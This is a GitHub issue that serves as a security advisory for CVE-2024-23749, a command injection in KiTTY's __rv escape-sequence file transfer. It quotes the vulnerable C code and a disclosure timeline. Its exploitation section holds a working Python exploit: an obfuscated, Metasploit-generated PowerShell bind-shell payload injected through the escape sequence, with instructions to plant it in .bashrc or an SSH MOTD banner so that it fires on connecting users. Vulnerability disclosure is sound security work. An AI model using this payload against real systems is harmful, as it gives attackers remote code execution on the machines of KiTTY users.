Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749) #526

Open
DEFCESCO opened this issue Feb 7, 2024 · 0 comments
Open

Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749) #526

DEFCESCO opened this issue Feb 7, 2024 · 0 comments

Comments

@DEFCESCO
Copy link

DEFCESCO commented Feb 7, 2024

Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)

Contents:

Summary

Analysis

Exploitation

Acknowledgments

Timeline

Additional Advisory

Summary:

Austin A. DeFrancesco (DEFCESCO) discovered a command injection vulnerability in KiTTY (https://github.com/cyd01/KiTTY/). This vulnerability:

  • Is exploitable by any KiTTY user connecting to a host with the embedded exploit;
  • The vulnerability was introduced in the original release in May 2021 (commit 4f79b1e) and affects all versions up to KiTTY ≤ 0.76.1.13 in their default configuration.

Austin developed an exploit for this vulnerability and obtained remote code execution in the context of the user running the application; by default, KiTTY can be operated in the user permission group of Standard Users. This exploit is stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.

Analysis:

CVE-2024-23749 command injection vulnerability is in kitty.c precisely the GetOneFile function. The vulnerable lines of code are on lines 2369-2386; in the latest revision 75fa2abcd220c172 (https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2369C4-L2391C2).

If KiTTY encounters the ANSI escape sequence \033]0;__rv in a stream, it interprets it as an instruction to transfer files using Putty Secure Copy Protocol (PSCP):

  • \033: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape sequence.
  • ]0;: This sequence part indicates a metacommand will be defined.
  • __rv: This is the vulnerable KiTTY command to transfer files using PSCP, which takes the input of a filename or file path.
  • \077: This is the terminator sequence to indicate the end of the escape sequence.
  • KiTTY’s kitty.c __rv command runs through specific handling based on the input parameters and configurations.

After the series of specific handling requests for other input parameters and configurations (at lines 2277-2368), KiTTY checks if the filename is larger than zero and checks if the filename is a directory or a single filename (at lines 2372). After these parameter and configuration checks, the filename is concatenated to the buffer (at line 2377). Finally, the constructed buffer is executed using the system( buffer ) (at line 2386).

CVE-2024-24749, where the filename variable is vulnerable to command injection, occurs due to insufficient input sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This allows an attacker to add inputs inside the filename variable, leading to arbitrary code execution.

2369 if( filename[0]=='/' ) {
2370 strcat(buffer, filename ) ;
2371 } else {
2372 if( (directory!=NULL) && (strlen(directory)>0) && (strlen(filename)>0) ) {
2373 strcat( buffer, directory ) ; strcat( buffer, "/" ) ; strcat( buffer, filename ) ;
2374 } else if( (directory!=NULL) && (strlen(directory)>0) ) {
2375 strcat(buffer, directory ) ; strcat( buffer, "/*") ;
2376 } else {
2377 strcat(buffer, filename ) ;
2378 }
2379 }
2380 strcat( buffer, "" "" ) ; strcat( buffer, dir ) ; strcat( buffer, """ ) ;
2381 //strcat( buffer, " > kitty.log 2>&1" ) ; //if( !system( buffer ) ) unlink( "kitty.log" ) ;
2382
2383 chdir( InitialDirectory ) ;
2384
2385 if( debug_flag ) { debug_logevent( "Get on file: %s", buffer) ; }
2386 if( system( buffer ) ) { MessageBox( NULL, buffer, "Transfer problem", MB_OK|MB_ICONERROR ) ; }
2387
2388 //debug_log("%s\n",buffer);//MessageBox( NULL, buffer, "Info",MB_OK );
2389
2390 memset(buffer,0,strlen(buffer));
2391 }

Exploitation:

__rv Command Injection:

From an attacker’s point of view, the exploit CVE-2024-23749 can be inserted into the .bashrc file for all users or in the SSH warning/message of the day (MOTD) banner. The exploit will trigger once the user logs in or is presented with the SSH warning/MOTD banner.

KiTTY’s __rv function crashed (at line 2601) because adjacent memory was overwritten.

To reproduce the exploit, follow these steps:

  1. Start KiTTY and start an SSH session.
  2. Update the payload handler and payload documented in the exploit’s comments.
  3. Save the exploit on the connected SSH session.
  4. Execute the exploit using Python: python3 CVE-2024-23749.py.
#!/usr/bin/python

#----------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY                    #
#        Get Remote File Through SCP Input (CVE-2024-23749)                              #
# OS: Microsoft Windows 11/10/8/7/XP                                                     #
# Author: DEFCESCO (Austin A. DeFrancesco)                                               #
# Software:                                                                              #
# https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip    #
#----------------------------------------------------------------------------------------#
# More details can be found on my blog: https://blog.DEFCESCO.io/Hell0+KiTTY             #
#----------------------------------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                             #
# [*] Payload Handler Started as Job 1                                                   #
# msf6 payload(cmd/windows/powershell_bind_tcp) >                                        #
# [*] Started bind TCP handler against 192.168.100.28:4444                               #
# [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
#----------------------------------------------------------------------------------------#

import os
import sys

#-----------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
#-----------------------------------------------------------------#

shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK'
shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+'
shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+'
shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY'
shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2'
shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc'
shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f'
shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr'
shellcode += b'ess))).ReadToEnd()))\"'

escape_sequence = b'\033]0;__rv:'
escape_sequence += b'" & '
escape_sequence += shellcode
escape_sequence += b' #\007' 

stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()

Acknowledgments:

Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.

Timeline:

2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont; no reply from Cyril.

2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.

2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).

Additional Advisory:

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables: https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@DEFCESCO